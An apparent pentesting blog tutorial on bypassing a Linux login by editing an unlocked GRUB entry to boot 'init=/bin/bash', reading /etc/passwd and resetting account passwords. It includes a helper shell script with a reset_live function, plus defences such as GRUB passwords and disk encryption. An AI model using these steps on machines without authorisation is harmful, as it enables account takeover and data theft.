For a while now, Linux distributions have disappointed hackers with reasonably secure login screens. But a login screen is only as strong as the boot chain in front of it: if the machine boots from an unlocked GRUB menu onto an unencrypted disk, a few keystrokes at boot drop you into a root shell that can reset any account's password and read any file. (This is a Linux bootloader trick; it does nothing against a Windows lock screen.) I'll be doing a full walkthrough on exactly how I did it, and hopefully you can get some use out of it.
Disclaimer: Do not do anything mentioned or explained in this article to another person or entity without their permission, and I am not responsible for any actions taken using information from this post.
With that taken care of, let’s get started!
This is a neat bypass method, but you’ll need a few things before you get started →
- A Kali Linux bootable USB (I’ll be making a short ‘how-to’ article after this is posted for those who aren’t familiar with Linux)
- Legal access to the computer you’re testing on
- (Optional) A bit of command line knowledge helps, but it’s not necessary.
- A target that boots through GRUB without a boot-menu password and whose root filesystem is not encrypted. A GRUB password stops you from pressing 'e' at all, and with full-disk encryption (LUKS) the kernel asks for the passphrase before you ever reach a shell on the installed system.
Physically, you just need a Kali Linux USB. Then, we can head over to the 'victim' computer and begin.
1. Boot the computer and stop at the GRUB menu (do NOT complete the boot)
Hopefully you read ahead a bit and didn't actually load into the OS, because we need to edit a few things once we get to this screen:
Once you're on the GRUB menu with the 'Kali GNU/Linux' entry highlighted (that is the installed system's own entry in my VM; on another distro the label differs but the steps are the same), press 'e'. This opens the editor for that boot entry, and you'll need to change a couple of things for our purposes.
2. Edit boot code
Once you've hit 'e' and made it to this screen, you'll see something a bit like this, probably at a different resolution. My text looks compacted because I'm on a virtual machine, but it makes little difference for our purposes. Find the line that starts with 'linux' (the kernel command line): somewhere on it you'll see 'ro' followed by either 'quiet splash' or, on the recovery entry, 'single'.
Change 'ro' to 'rw', as we have above, so the root filesystem is mounted writable. Then, after 'quiet splash' (or 'single'), add 'init=/bin/bash' so the kernel hands control to a shell instead of the init system. Press Ctrl-X (or F10) to boot the edited entry. This boots rather than reboots, and nothing is written to disk: the edit lasts for this one boot only. If everything works and you're presented with a shell prompt (bash may complain about job control; that's harmless), move to step 3. If the kernel panics because it can't find the init you named, repeat the process with 'init=/bin/sh', which exists on every Linux system, or '/bin/zsh' on Kali, which ships zsh as its default shell.
3. Root shell! Retrieve and modify some info with our root permissions.
Great. Now we've got some things we can do on this machine. Run 'mount' to check our work: the line for '/' should end in '(rw,...)'. If it still says '(ro,...)', the 'rw' edit didn't take, and every write, including 'passwd' (which fails with 'Authentication token manipulation error'), will be refused until you run 'mount -o remount,rw /'.
Run 'cat /etc/passwd' to view the accounts registered on the machine:
This will dump a fair amount of information, most of it system accounts (UIDs below 1000, usually with a /usr/sbin/nologin shell), so you might need to sift through it to find the exact username you're looking for. Regular users start at UID 1000. It should look a bit like this:
root:x:0:0:root:/root:/usr/bin/zsh ... graham1234:x:1000:1000:graham1234,,,:/home/graham1234 ...
A basic command after that, 'passwd graham1234' (substitute the username you found),
will prompt for a new password twice and never ask for the old one: root may set any account's password without authenticating. That exists for administrative recovery, and it is the worst-case scenario when someone untrusted reaches this shell, but we can use it to our advantage as pen-testers. Two caveats before you hit Enter. First, this is loud: the owner finds out at their next login, and the modification time of /etc/shadow changes, which stands out in a forensic timeline. Second, you already have root here, so if the goal is the user's files you can simply read or copy them from this shell and leave the password alone.
4. Lastly, reboot the system
A plain 'reboot' usually does nothing here, because there is no init process for it to talk to. Run 'sync' (so the password change actually reaches the disk) followed by 'reboot -f'; alternatively, 'exec /sbin/init' continues the normal boot without restarting. Either way you should be brought to the default Kali Linux login page:
Sign in with the credentials you modified before, using the equivalent of 'graham1234' and the password you just set. You now have that user's session and full access to their home directory, and because you reached it through a root shell you could just as easily have reset root's password or copied files straight out of the shell (with permission, of course). Pretty neat! The defences are as simple as the attack: set a GRUB password ('set superusers' plus a 'password_pbkdf2' hash in /etc/grub.d/40_custom) so that 'e' prompts for credentials, encrypt the disk so the root filesystem is unreadable without the passphrase, and put a BIOS/UEFI password on the firmware so the boot order can't be changed to a USB stick in the first place.
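Here is the whole procedure condensed into a shell script, as an added example that is not part of the original post. The parsing helpers run on constructed sample data (a GRUB kernel line, 'mount' output, a passwd file and two grub.cfg fragments modelled on the screenshots above, with a made-up UUID and kernel version), so the script runs anywhere; only reset_live() needs the real machine, and it is defined but not called. grub_is_locked is the defensive counterpart: it looks for the superusers/password_pbkdf2 lines that would have stopped step 2.

```shell
#!/bin/sh
# Added example, not the post's own commands: helpers for the GRUB
# init=/bin/bash password reset walked through in steps 1-4, plus the
# checks worth running before and after. All data below is constructed
# so the script runs anywhere; the only part that needs the real machine
# is reset_live(), which is defined but never called.

# Step 2: rewrite a GRUB 'linux' line the way the post does by hand.
# A standalone 'ro' becomes 'rw' (root=UUID=... is left alone) and
# init=/bin/bash is appended, whether the line ends in 'quiet splash'
# or 'single'. Reads the line on stdin.
grub_bypass_line() {
    sed -E 's/(^|[[:space:]])ro([[:space:]]|$)/\1rw\2/; s/[[:space:]]*$/ init=\/bin\/bash/'
}

# Step 3 check: given the output of 'mount' on stdin, succeed only if /
# is mounted read-write. Some initramfs setups leave / read-only despite
# the 'rw' edit; passwd then fails with "Authentication token
# manipulation error" until you run: mount -o remount,rw /
root_is_rw() {
    awk '$3 == "/" && $6 ~ /^\(rw[,)]/ { found = 1 } END { exit !found }'
}

# Step 3: pick the interactive accounts out of /etc/passwd (stdin):
# root plus regular users (UID 1000-59999) whose shell is not
# nologin/false. Prints "name uid shell", one per line.
login_accounts() {
    awk -F: '($3 == 0 || ($3 >= 1000 && $3 < 60000)) && $7 !~ /(nologin|false)$/ { print $1, $3, $7 }'
}

# Mitigation check: the whole trick depends on GRUB letting anyone press
# 'e'. A grub.cfg (stdin) that sets superusers and a password_pbkdf2 hash
# demands those credentials before the editor opens. Succeeds if locked.
grub_is_locked() {
    awk '/^[[:space:]]*set superusers=/ { a = 1 }
         /^[[:space:]]*password_pbkdf2 / { b = 1 }
         END { exit !(a && b) }'
}

# The live sequence for the root shell you land in after step 2. Not run
# here. A bare 'reboot' usually hangs because no init process exists to
# talk to, hence sync followed by reboot -f.
reset_live() {
    mount | root_is_rw || mount -o remount,rw /
    passwd "$1"          # asks for the new password twice, never the old one
    sync
    reboot -f
}

# --- constructed sample data, modelled on the post's screenshots ---
SAMPLE_GRUB='linux /boot/vmlinuz-6.1.0-kali5-amd64 root=UUID=1234-abcd ro quiet splash'
SAMPLE_MOUNT='/dev/sda1 on / type ext4 (ro,relatime,errors=remount-ro)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)'
SAMPLE_PASSWD='root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
graham1234:x:1000:1000:graham1234,,,:/home/graham1234:/usr/bin/zsh
backup-svc:x:1001:1001::/var/lib/backup-svc:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin'
SAMPLE_GRUB_CFG_OPEN='menuentry "Kali GNU/Linux" {
    linux /boot/vmlinuz root=UUID=1234-abcd ro quiet splash
}'
SAMPLE_GRUB_CFG_LOCKED='set superusers="root"
password_pbkdf2 root grub.pbkdf2.sha512.10000.REDACTED
menuentry "Kali GNU/Linux" --unrestricted {
    linux /boot/vmlinuz root=UUID=1234-abcd ro quiet splash
}'

printf 'Edited GRUB line: %s\n' "$(printf '%s\n' "$SAMPLE_GRUB" | grub_bypass_line)"
printf 'Root fs writable before remount: '
printf '%s\n' "$SAMPLE_MOUNT" | root_is_rw && echo yes || echo no
printf 'Accounts worth resetting:\n'
printf '%s\n' "$SAMPLE_PASSWD" | login_accounts
printf 'Unprotected grub.cfg locked: '
printf '%s\n' "$SAMPLE_GRUB_CFG_OPEN" | grub_is_locked && echo yes || echo no
printf 'Hardened grub.cfg locked: '
printf '%s\n' "$SAMPLE_GRUB_CFG_LOCKED" | grub_is_locked && echo yes || echo no
```

Run it as-is to see the edited kernel line, the read-only root detection and the two accounts worth resetting; on a real engagement, source the file from the init=/bin/bash shell and call reset_live with the username from login_accounts. The '--unrestricted' flag in the locked sample is deliberate: it lets anyone boot the entry normally while still requiring the GRUB password to edit it, which is the configuration that blocks this post's technique without locking legitimate users out of the menu.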
I hope this post was informative or helpful to you in some way. If you'd like to see similar articles, check out The Gray Area or grahamzemel.com.